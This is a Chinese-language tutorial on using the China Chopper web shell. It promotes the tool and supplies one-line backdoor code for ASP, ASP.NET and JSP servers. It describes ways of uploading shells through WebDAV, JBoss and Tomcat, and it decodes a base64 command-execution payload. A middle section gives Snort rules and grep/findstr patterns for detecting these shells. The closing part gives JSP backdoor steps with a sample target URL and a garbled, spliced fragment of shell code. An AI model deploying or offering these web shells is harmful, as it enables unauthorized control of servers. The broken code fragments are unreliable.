中國菜刀使用方法以及小技巧
相信大多數的站長都用FTP來管理web空間���,但是相對于菜刀來說FTP簡直弱到爆.就數據庫管理方面來說���,phpmyadmin和帝國軟件只能管理mysql數據庫�,而且在軟件的體積上跟菜刀完全沒法比���,如果精通SQL語法�����,何必還要PHPMYADMIN呢���?而且中國菜刀以其特×××形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS����,支持ADO方式連接的數據庫���。
服務端:
在服務端運行的代碼如下:
PHP:
ASP: <%eval request(“pass”)%>
ASP.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
JSP:<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>
(注意: ASP.NET要單獨一個文件或此文件也是Jscript語言)
叉叉之前在上傳漏洞演示���,利用burpsuite抓包改包上傳最后講到用菜刀連接�,看看是怎么實現的:
在主視圖中右鍵/添加����,在彈出的對話框中輸入服務端地址��,連接的密碼(這個必須要)����,選擇正確的腳本類型和語言編碼����,保存后即可使用文件管理��,虛擬終端�,數據庫管理三大塊功能�。要是其它都沒錯誤��,那么可能就是你把語言編碼選錯了.
1. 文件管理:緩存下載目錄����,并支持離線查看緩存目錄����,上傳下載修改文件
2. 虛擬終端:人性化的設計����,操作方便;(輸入HELP查看更多用法)
3. 數據庫管理:圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS支持ADO方式連接的數據庫��。
(各種腳本條件下的數據庫連接方法請點擊數據庫管理界面左上角處的配置按鈕查看)
PHP腳本:
類型 類型可為MYSQL,MSSQL,ORACLE,INFOMIX中的一種
主機地址 主機地址可為機器名或IP地址���,如localhost
數據庫用戶 連接數據庫的用戶名�,如root
數據庫密碼
連接數據庫的密碼��,如123455
ASP和ASP.NET腳本:
類型 類型只能填ADO
ADO配置信息
ADO連接各種數據庫的方式不一樣���。如MSSQL的配置信息為
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
4. 網站蜘蛛功能:織出一張網站的目錄結構����。下載的列表文件存在桌面��,右鍵菜單/載入URL列表即可以根據地址得到目錄結構
中國菜刀上傳的機制:
通過WebDAV文件上傳
通過JBoss jmx-console 或者Apache的Tomcat管理頁面上傳
遠程代碼執行下載
通過其他方式接入后傳輸
其***payload的編碼如下:
Password=Response.Write("->|");
var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).GetString(System. Convert.FromBase64String("dmFyIGM9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU3RhcnRJbmZvKFN5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0luZyhSZXF1ZXN0Lkl0ZW1bInoxIl0pKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0luZyhSZXF1ZXN0Lkl0ZW1bInoyIl0pKTtlLlN0YXJ0KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkrRUkuUmVhZFRvRW5kKCkpOw%3D%3D")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();&z1=Y21k&z2=Y2QgL2QgImM6XGluZXRwdWJcd3d75px9vdFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D
使用Fiddler的text wizard功能將其base64解碼為明文varc=newSystem.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding(65001).
GetString(System.Convert.FromBase64String(Request.Item["z1"])));
vare=newSystem.Diagnostics.Process();
varout:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;c.RedirectStandardError=true;
e.StartInfo=c;c.Arguments="/c"+System.Text.Encoding.GetEncoding(65001).
GetString(System.Convert.FromBase64String(Request.Item["z2"]));
e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();
Response.Write(out.ReadToEnd()+EI.ReadToEnd());
上面這段代碼的意思是使用base64解碼存儲在z1�����、z2這兩個參數中的數據�。接下來我們來查看z1與z2對應的值����。
&z1=Y21k&z2=Y2QgL2QgImM6XGluZXRwdWJcd3d75px9vdFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D
base64解碼參數對應的值���,如下所示:
z1=cmdz2=cd /d "c:\inetpub\wwwroot\"&whoami&echo [S]&cd&echo [E]
其中z1的值是cmd���,z2的值是cd /d “c:\inetpub\wwwroot\”&whoami&echo [S]&cd&echo [E]�����。該操作的意思就是執行cmd命令�����,列出當前用戶與當前目錄����,執行結果如下所示:
->|nt authority\network service[S]C:\Inetpub\wwwroot[E]|<-
now��,我們知道中國菜刀的流量通信的特征��,可以利用網絡或主機級別的防護軟件檢測這種惡意通信����。
網絡:
可以利用Snort編寫規則檢測中國菜刀的流量�����,能夠輕松的捕獲到異常數據�����,Keith Tyler在他的博客中給出了一個基本的IDS規則:
alert tcp any any -> any 80 ( sid:900001; content:"base64_decode";http_client_body;flow:to_server,established; content:"POST"; nocase;http_method; ;msg:"Webshell Detected Apache";)
為了減少誤報�����,我們將該段規則修改了下�,只檢測數據包內容中包含FromBase64String以及z1�����,如下:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg: "China Chopper with first Command Detected";
flow:to_server,established; content: "FromBase64String";
content: "z1"; content:"POST"; nocase;http_method;
reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/
breaking-down-the-china-chopper-web-shell-part-i.html;
classtype:web-application-attack; sid: 900000101;)
以下規則更進一步優化�,以下規則在數據包中查找FromBase64String���,并且利用正則表達式匹配z后面任意一到三的數字組合���,如Z1��、Z10�、Z100等��。
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg: "China Chopper with all Commands Detected"; flow:to_server,established;
content: "FromBase64String"; content: "z"; pcre: "/Z\d{1,3}/i"; content:"POST"; nocase;http_method;
reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/
breaking-down-the-china-chopper-web-shell-part-i.html;
classtype:web-application-attack; sid: 900000102;)
這些IDS特征都可以進一步優化��,OK�����,我們了解了網絡層面如何檢測中國菜刀數據包�����,接下來介紹下如何通過主機級別的檢測發現該數據包�����。
主機:
在Linux上最快最簡單的方法查找中國菜刀��,可以利用egrep+正則表達式識別被感染的文件�,如下:
egrep -re ' [<][?]php\s\@eval[(]\$_POST\[.+\][)];[?][>]' *.php
egrep+正則表達式是一個強大的組合����,國外安全研究者Ian Ahl編寫了一些正則表達式教程��,如下:
regex basics
Using regex with Notepad
另外�,Window提供了一種方法�����,通過findstr命令加上正則表達式搜索文件�����。如下:
可以看到在Windows上正則表達式與linux略有區別�,如下:
findstr /R "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php
以上命令是查找PHP shell����,如果要查找ASPX shell�����,只需修改正則表達式即可�,如下:
egrep -re '[<]\%\@\sPage\sLanguage=.Jscript.\%[>][<]\%eval.Request\.Item.+unsafe' *.aspx
findstr /R "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx
如果你要查找一些隱藏的PHP或ASPX文件��,可以使用dir命令來���,如下:
dir /S /A /B *.php
Findstr還可以搜索子目錄:
findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php
記錄一下JSP幾種后門
以下是服務端���,保存成one.jsp并上傳至目標服務器中�����。
通過使用一句話***客戶端連接one.jsp***�。
將下列代碼保存為html頁面:
JSP一句話***客戶端
專用JSP***連接器
服務端地址
保存完成后��,打開html頁面��,寫入一句話***服務端地址���, 例如http://shenwolf.wap.zhanqunabc.cn/ ����,寫入需要的代碼和保存的文件名稱點擊保存即服務器�,使用中國菜刀工具進行連File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"rn");}br.close();}else OutputStreamWriter(new {KK(z1,z2);sb.append("1");}else
if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"
